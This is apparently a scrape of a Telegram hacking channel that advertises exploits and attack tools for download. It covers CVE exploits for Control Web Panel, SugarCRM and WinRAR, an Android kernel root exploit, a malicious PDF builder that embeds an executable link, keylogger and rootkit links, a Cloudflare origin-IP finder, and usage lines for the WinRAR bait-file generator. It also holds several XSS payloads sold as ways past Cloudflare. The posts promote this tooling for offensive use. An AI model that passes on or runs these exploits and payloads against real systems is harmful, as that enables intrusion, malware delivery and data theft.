BugCod3

Https://discord.gg/UfFvDYBBMM

📢

t.iss.one/SashClient

🪩

🌐

Https://sash.mybin.ir

Please open Telegram to view this post

VIEW IN TELEGRAM

539 viewsedited 22:00

Control-Web-Panel.txt

3.8 KB

Control Web Panel Unauthenticated Remote Command Execution Exploit

➖

Category: remote exploits

🖥

Platform: linux

🪖

Risk: Security Risk Critical 🚨

🗂️

Size:

🅰

📝

Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.

⭐

CVE: CVE-2022-44877

#CVE #Linux #Exploit

➗

👤

Https://discord.gg/UfFvDYBBMM

📢

t.iss.one/SashClient

🪩

🌐

Https://sash.mybin.ir

Please open Telegram to view this post

VIEW IN TELEGRAM

494 viewsedited 00:53

Exploits bank of NMAP program

🔗

Link

#Nmap #Vuln #Exploit

➗

👤

📢

Please open Telegram to view this post

VIEW IN TELEGRAM

393 viewsedited 11:41

Post exploitation tools:

➕

Vegile — Ghost In The Shell:

😸

GitHub

➕

Chrome Keylogger:

😸

GitHub

➕

Forensic tools

➕

Autopsy:

😸

GitHub

➕

Wireshark:

🌐

Site

➕

Bulk extractor:

😸

GitHub

➕

Disk Clone and ISO Image Aquire:

🌐

Site

➕

Toolsley:

🌐

SIte

#RootKit #Keylogger #Exploit #Tools

➗

👤

📢

Please open Telegram to view this post

VIEW IN TELEGRAM

👍1

518 views11:02

SugarCRM 12.x Remote Code Execution / Shell Upload Exploit

Category: remote exploits

Platform: php

Risk: [Security Risk Critical]

Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.

CVE: 2023-22952

Download

#CVE #Exploit #Rc #Shell
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3

407 views17:29

Microsoft Windows 11 - 'cmd.exe' Denial of Service

Platform: Windows

Type: dos

Exploit-db

Dwonload

#Windows #Exploit #Python
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3

435 viewsedited 21:40

Marijuana Exploit

🍀

⬇️

Download

🔒

@LearnExploit

#Exploit #Bot

➗

🔥

0Day.Today

👤

📢

t.iss.one/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

6❤2❤‍🔥2⚡1

1.02K viewsedited 13:14

🪳

CVE-2023-38831 winrar exploit generator

🪳

👥

Quick poc test:
Generate the default poc for test

python cve-2023-38831-exp-gen.py poc

python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar

👤

Custom:
⚪️ Place the bait file and (evil) script file in the current directory, the bait file is recommended to be an image (.png, jpg) or a document (.pdf)
⚪️ Run

python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>

to generate your exploit

👆

Analysis Blog

👁‍🗨

Reference

😸

Github

⬇️

🔒

BugCod3

#CVE #Winrar #Exploit

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤4⚡1👍11

1.05K views00:03

💜

CloudPeler

💜

📊 CrimeFlare is back again! This tools can help you to see the real IP behind CloudFlare protected websites

👁‍🗨 Introduction:
This tool serves to find the original IP behind websites that have been protected by CloudFlare, the information generated can be useful for further penetration. The information generated by this tool is as follows.

⚪️ CloudFlare IP
⚪️ CloudFlare NS1
⚪️ CloudFlare NS2
⚪️ Real IP
⚪️ Hostname
⚪️ Organization
⚪️ Address (Country, City, Region, Postal Code)
⚪️ Location
⚪️ Time Zone

💻 Code Samples:
This tool is made with PHP code with very simple programming using several APIs to get maximum results, but this tool does not guarantee 100% to be able to bypass websites that have been protected by CloudFlare. Some websites sometimes cannot be detected by their original IP.

📱 Installation:

sudo apt install php-curl
cd CloudPeler
./crimeflare.php exemple.com

😸

Github

⬇️

🔒

BugCod3

#Cloudflare #Bypass #Exploit

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤42⚡1👍1🥰1

1.12K views13:14

This media is not supported in your browser

VIEW IN TELEGRAM

⚡️

Cloud7 Bot Exploit ⚡️

Run Script with Python 2.7

📊 Recommended:

python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml

⬇️

Download
🔒 @LearnExploit

#Exploit #Tools

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

9❤3❤‍🔥1⚡1

956 views19:30

Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

👍33⚡2❤2

1.08K views15:47

🐱 SiCat 🐱

The useful exploit finder

💬

SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:

pip  install  -r  requirements.txt

💻 Usage:

python sicat.py --help

📂 Example:
From keyword:

python sicat -k telerik --exploitdb --msfmodule

From nmap output:

nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm

😸

Github

⬇️

🔒

BugCod3

#Exploit #Metasploit #Finder

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡2❤1👍1🔥1🐳1

889 views14:25

🔥

PDF-BUILDER (POC) - (Non Silent)

🔥

💬

POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).

💻 Usage:
Put your exe-link and build the PDF-FILE

😸

Github

⬇️

🔒

BugCod3

#C #PDF #Exploit

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡3🔥3❤2👎2

1.26K views01:14

Mali GPU Kernel LPE

Android 14 kernel exploit for Pixel7/8 Pro

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:

Pixel 8 Pro: google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
Pixel 7: google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys

Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.

Github

⬇️ Download
🔓 BugCod3

#C #Exploit #Android #Kernel #Pixel
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

❤1⚡1👍1🔥1

906 views17:39